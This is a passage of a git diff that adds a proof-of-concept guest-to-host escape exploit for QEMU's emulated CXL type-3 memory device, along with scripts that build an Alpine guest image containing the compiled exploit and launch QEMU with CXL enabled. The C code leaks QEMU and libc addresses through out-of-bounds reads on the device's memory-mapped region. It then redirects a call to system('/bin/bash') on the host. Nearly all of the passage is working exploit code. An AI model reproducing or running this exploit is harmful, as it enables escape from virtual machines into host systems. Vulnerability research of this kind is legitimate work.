printf("\n"); + printf("[*] ok here we go\n"); + return; +} + +static int leak_more(volatile uint8_t *mmio, uint64_t ct3d_host, + uint64_t rank_host, uint64_t memmove_plt, + uint64_t libc_start_main_got, uint64_t *_system) +{ + uint64_t leak_slot = ct3d_host + 0x5400 + 0x240000 + 0x100; + uint64_t leak_src = libc_start_main_got - (CXL_CACHELINE_SIZE - 1); + uint8_t raw[8]; + uint64_t libc_start_main; 
+ uint64_t libcbase; + + fake_write_call(mmio, rank_host, memmove_plt, leak_slot, leak_src, NULL); + leak_oob_relative(mmio, 0x100, raw, sizeof(raw)); + + libc_start_main = *(uint64_t *)raw; + printf("[+] __libc_start_main: 0x%016" PRIx64 "\n", libc_start_main); + + libcbase = libc_start_main - 0x2A200; + *_system = libcbase + 0x058750; + printf("[+] libcbase: 0x%016" PRIx64 "\n", libcbase); + printf("[+] system: 0x%016" PRIx64 "\n", *_system); + return 0; +} + +int main() { + volatile uint8_t *mmio; + uint64_t ct3d_host; + uint64_t rank_host; + uint64_t memmove_plt; + uint64_t libc_start_main_got; + uint64_t _system; + int fd; + + setbuf(stdout, NULL); + + if (enable_pci_memory_decode("/sys/bus/pci/devices/0000:35:00.0") < 0) { + return 1; + } + + fd = open("/sys/bus/pci/devices/0000:35:00.0/resource2", O_RDWR | O_SYNC); + if (fd < 0) { + printf("[-] failed to open. \n"); + return 1; + } + + mmio = mmap(NULL, CXL_BAR2_MAP_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0); + if (mmio == MAP_FAILED) { + return 1; + } + + leak_qemu(mmio, &memmove_plt, &libc_start_main_got); + leak_oob_relative(mmio, 0x90, &ct3d_host, 8); + rank_host = ct3d_host + 0x6c5762; + + leak_more(mmio, ct3d_host, rank_host, memmove_plt, libc_start_main_got, &_system); + printf("[*] outside the Wall Maria...\n"); + fake_write_call(mmio, rank_host, _system, 0, 0, "/bin/bash"); + + return 0; +} diff --git a/qemu/qemu-system-x86_64 b/qemu/qemu-system-x86_64 new file mode 100755 index 0000000..b1e578c Binary files /dev/null and b/qemu/qemu-system-x86_64 differ diff --git a/qemu/run_qemu_shell.sh b/qemu/run_qemu_shell.sh new file mode 100755 index 0000000..f8781ad --- /dev/null +++ b/qemu/run_qemu_shell.sh @@ -0,0 +1,41 @@ +#!/bin/sh +set -eu + +DIR=$(CDPATH= cd -- "$(dirname -- "$0")" && pwd) +TMPDIR=${TMPDIR:-"$DIR/tmp"} +export TMPDIR + +ROOTFS="$DIR/images/alpine" +ROOTFS_GZ="$ROOTFS.gz" + +mkdir -p "$TMPDIR" + +if [ ! -e "$ROOTFS" ]; then + if [ ! 
-f "$ROOTFS_GZ" ]; then + echo "missing rootfs: $ROOTFS_GZ" >&2 + exit 1 + fi + + ROOTFS_TMP="$ROOTFS.$$" + trap 'rm -f "$ROOTFS_TMP"' EXIT HUP INT TERM + gzip -dc "$ROOTFS_GZ" > "$ROOTFS_TMP" + mv "$ROOTFS_TMP" "$ROOTFS" + trap - EXIT HUP INT TERM +fi + +exec "$DIR/qemu-system-x86_64" \ + -accel tcg \ + -machine q35,cxl=on \ + -m 512M,maxmem=2G,slots=4 \ + -smp 1 \ + -nographic -no-reboot -snapshot \ + -kernel "$DIR/images/vmlinuz-linux" \ + -append "root=/dev/vda rw console=ttyS0,115200 earlycon=uart8250,io,0x3f8,115200 loglevel=8 ignore_loglevel printk.time=1 devtmpfs.mount=1 pci=realloc" \ + -drive file="$ROOTFS",file.locking=off,if=none,format=raw,id=rootfs \ + -device virtio-blk-pci,drive=rootfs \ + -device pxb-cxl,id=cxl.0,bus=pcie.0,bus_nr=52 \ + -device cxl-rp,id=rp0,bus=cxl.0,chassis=0,slot=0 \ + -object memory-backend-ram,id=cxl-mem0,size=256M \ + -object memory-backend-ram,id=dc-mem0,size=256M \ + -device cxl-type3,bus=rp0,volatile-memdev=cxl-mem0,volatile-dc-memdev=dc-mem0,num-dc-regions=1,id=mem0 \ + -M cxl-fmw.0.targets.0=cxl.0,cxl-fmw.0.size=512M diff --git a/qemu/setup_guest.sh b/qemu/setup_guest.sh new file mode 100755 index 0000000..086d679 --- /dev/null +++ b/qemu/setup_guest.sh @@ -0,0 +1,55 @@ +#!/bin/sh +set -eux + +mkdir -p images +mkdir -p poc + +cp /boot/vmlinuz-linux images/vmlinuz-linux +chmod 0755 images/vmlinuz-linux + +curl -L --fail --show-error \ + -o images/alpine-latest-releases.yaml \ + https://dl-cdn.alpinelinux.org/alpine/v3.23/releases/x86_64/latest-releases.yaml + +curl -L --fail --show-error \ + -o images/alpine-minirootfs-3.23.4-x86_64.tar.gz \ + https://dl-cdn.alpinelinux.org/alpine/v3.23/releases/x86_64/alpine-minirootfs-3.23.4-x86_64.tar.gz + +rm -rf alpine_root_fs.tmp +mkdir -p alpine_root_fs.tmp +tar -xzf images/alpine-minirootfs-3.23.4-x86_64.tar.gz -C alpine_root_fs.tmp + +printf '%s\n' \ + https://dl-cdn.alpinelinux.org/alpine/v3.23/main \ + https://dl-cdn.alpinelinux.org/alpine/v3.23/community \ + > 
alpine_root_fs.tmp/etc/apk/repositories + +rm -f alpine_root_fs.tmp/sbin/init +cat > alpine_root_fs.tmp/sbin/init <<'EOF' +#!/bin/sh + +PATH=/sbin:/bin:/usr/sbin:/usr/bin +export PATH + +mount -t devtmpfs devtmpfs /dev 2>/dev/null || true +mount -t proc proc /proc 2>/dev/null || true +mount -t sysfs sysfs /sys 2>/dev/null || true + +exec /bin/sh </dev/console >/dev/console 2>&1 +EOF +chmod 0755 alpine_root_fs.tmp/sbin/init + +gcc -static -O2 -Wall -Wextra -o poc/exp poc.c + +cp poc/exp alpine_root_fs.tmp/exp +chmod 0755 alpine_root_fs.tmp/exp + +rm -f images/alpine.tmp +truncate -s 128M images/alpine.tmp +mkfs.ext4 -q -F -d alpine_root_fs.tmp images/alpine.tmp + +rm -rf alpine_root_fs +mv alpine_root_fs.tmp alpine_root_fs +mv images/alpine.tmp images/alpine + +echo done diff --git a/qemu/vgabios-stdvga.bin b/qemu/vgabios-stdvga.bin new file mode 100644 index 0000000..5b48ca8 Binary files /dev/null and b/qemu/vgabios-stdvga.bin differ